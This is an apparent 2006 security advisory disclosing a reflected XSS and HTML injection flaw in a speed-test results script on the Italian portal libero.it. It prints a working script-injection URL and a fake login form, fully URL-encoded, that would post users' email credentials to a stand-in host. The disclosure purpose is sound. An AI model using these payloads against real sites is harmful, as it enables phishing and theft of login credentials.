libero.it XSS vulnerability - HTML injection

["Davide Denicolo" <davide@xxxxxxxxxxxxxxxxx>]

--Security Report--
Advisory: libero.it XSS vulnerability - HTML injection
---
Author: Davide Denicolo
---
Date: 28/04/06 
---
Contact: davide<at>securityinfos.com
---
Vendor: ItaliaOnLine S.r.l (http://www.libero.it)
Service: Web
Level: Low
---
Description:

Libero.it is a Web portal of big Italian ISP: ItaliaOnLine offering
dial-up,Broadband and talk services.
A Broadband service  called "Libero speedtest" is a simple "Bandwidth Speed
Test";
A java applet test, send Bandwidth information to perl script
(print_result_spt.pl) in the GET request and
this perl script simply put parameter in the page as HTML;
an attacker can exploit the vulnerable script to have arbitrary script code
executed in the browser or injects html form so redirect a login
authentication to another web application;

this is a normal HTTP URL:
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=868.02&up=220.5
3&tdown=18875&tup=74297&size=2048.0&t=0

this is a XSS URL:

http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up=<scr
ipt>alert('ciao')</script>&tdown=3455&tup=5107&size=2048.0&t=0



and this is an HTML form :

<table border="0" width="32%">
        <form method="POST" action="http://127.0.0.1";>
                <tr>
                        <td width="19%">
                                <input type="text" name="T2"
style="font-size:7pt">
                        </td>
                        <td width="81%">
                                <select size="1" name="D1"
style="font-size:8pt">
                                        <option
value="1">@libero.it</option>
                                        <option
value="2">@inwind.it</option>
                                        <option value="4">@iol.it</option>
                                        <option value="66">@blu.it</option>
                                </select>
                        </td>
                </tr>
                <tr>
                        <td width="19%">
                                <input type="password" name="T3"
style="font-size:7pt">
                        </td>
                        <td>
                                <p>
                                <input tabindex="4" value="Entra"
name="Act_Login" src="http://www.libero.it/i05/entra_hp.gif"; alt="Entra"
border="0" height="22" type="image" width="44">
                                </p>
                        </td>
                </tr>
        </form>
</table>

and this is previous form injects in the request:

http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up=<tab
le%20border="0"%20width="32%"><form%20method="POST"%20action="http://127.0.0
.1"><tr><td%20width="19%"><input%20type="text"%20name="T2"%20style="font-siz
e:7pt"></td><td%20width="81%"><select%20size="1"%20name="D1"%20style="font-s
ize:8pt"><option%20value="1">@libero.it</option><option%20value="2">@inwind.
it</option><option%20value="4">@iol.it</option><option%20value="66">@blu.it<
/option></select></td></tr><tr><td%20width="19%"><input%20type="password"%20
name="T3"%20style="font-size:7pt"></td><td><p><input%20tabindex="4"%20value=
"Entra"%20name="Act_Login"%20src="http://www.libero.it/i05/entra_hp.gif"%20a
lt="Entra"%20border="0"%20height="22"%20type="image"%20width="44"></p></td><
/tr></form></table>&tdown=3455&tup=5107&size=2048.0&t=0
-- 

Timeline:
* 2/05/2006: Vulnerability found.
* 2/05/2006: Unable to contact vendor
-- 

For more information, please send question to: davide<at>secutityinfos.com